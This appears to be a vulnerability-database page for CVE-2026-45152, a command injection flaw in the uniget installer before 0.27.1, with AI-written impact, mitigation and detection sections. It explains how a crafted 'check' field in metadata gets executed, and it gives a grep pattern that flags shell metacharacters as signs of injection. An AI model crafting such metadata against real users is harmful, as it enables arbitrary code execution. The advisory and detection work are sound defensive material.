CVE-2026-45152
Deferred Deferred - Pending Action
Command Injection in Uniget Prior to 0.27.1

Publication date: 2026-05-27

Last updated on: 2026-06-01

Assigner: GitHub, Inc.

Description
uniget is a universal installer and updater for (container) tools. Prior to 0.27.1, a command injection vulnerability exists in uniget due to unsafe execution of the check field from metadata files using /bin/bash -c. Because the check field is loaded directly from untrusted JSON metadata without validation or sanitization, an attacker can craft malicious metadata that executes arbitrary shell commands on the victim’s system when common uniget operations such as describe, install, update, or inspect are performed. This vulnerability can lead to arbitrary code execution with the privileges of the user running uniget. This vulnerability is fixed in 0.27.1.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-27
Last Modified
2026-06-01
Generated
2026-06-17
AI Q&A
2026-05-28
EPSS Evaluated
2026-06-15
NVD
CVE-2026-45152
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
uniget uniget to 0.27.1 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

The vulnerability in uniget, a universal installer and updater for container tools, is a command injection flaw present before version 0.27.1. It occurs because uniget unsafely executes the 'check' field from metadata files using /bin/bash -c without validating or sanitizing this input. Since the 'check' field is loaded directly from untrusted JSON metadata, an attacker can craft malicious metadata that causes arbitrary shell commands to be executed on the victim's system when uniget operations like describe, install, update, or inspect are run.

This means an attacker can execute arbitrary code with the same privileges as the user running uniget.

Impact Analysis

This vulnerability can lead to arbitrary code execution on your system with the privileges of the user running uniget. An attacker exploiting this flaw could run malicious commands, potentially leading to unauthorized access, data theft, system compromise, or disruption of services.

Mitigation Strategies

To mitigate this vulnerability, immediately upgrade uniget to version 0.27.1 or later, where the issue is fixed.

Avoid using untrusted or suspicious metadata files with uniget until the upgrade is applied.

Limit the privileges of the user running uniget to reduce potential impact of arbitrary code execution.

Compliance Impact

This vulnerability allows arbitrary code execution with the privileges of the user running uniget, which can lead to unauthorized access, data exfiltration, and system compromise.

Such unauthorized access and potential data breaches could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of sensitive data and maintaining system integrity.

Exploitation of this vulnerability could result in confidentiality, integrity, and availability violations, thereby increasing the risk of non-compliance with these regulations.

Detection Guidance

This vulnerability involves command injection through the `check` field in uniget metadata files, which is executed via `/bin/bash -c` without validation. To detect if your system is vulnerable, you should first identify if you are running uniget versions prior to 0.27.1.

You can check the installed uniget version by running the following command:

  • uniget --version

If the version is 0.27.0 or earlier, your system is potentially vulnerable.

To detect if malicious metadata files with crafted `check` fields exist, you can search for suspicious shell metacharacters in uniget metadata JSON files. For example, you can run a command like:

  • grep -rE '"check"\s*:\s*".*[;|&$()]' /path/to/uniget/metadata/

This command searches recursively for `check` fields containing shell metacharacters such as ;, |, &, $, or parentheses, which are indicators of possible command injection attempts.

Additionally, monitoring uniget operations (describe, install, update, inspect) for unexpected shell command executions or unusual network activity may help detect exploitation attempts.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-45152. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart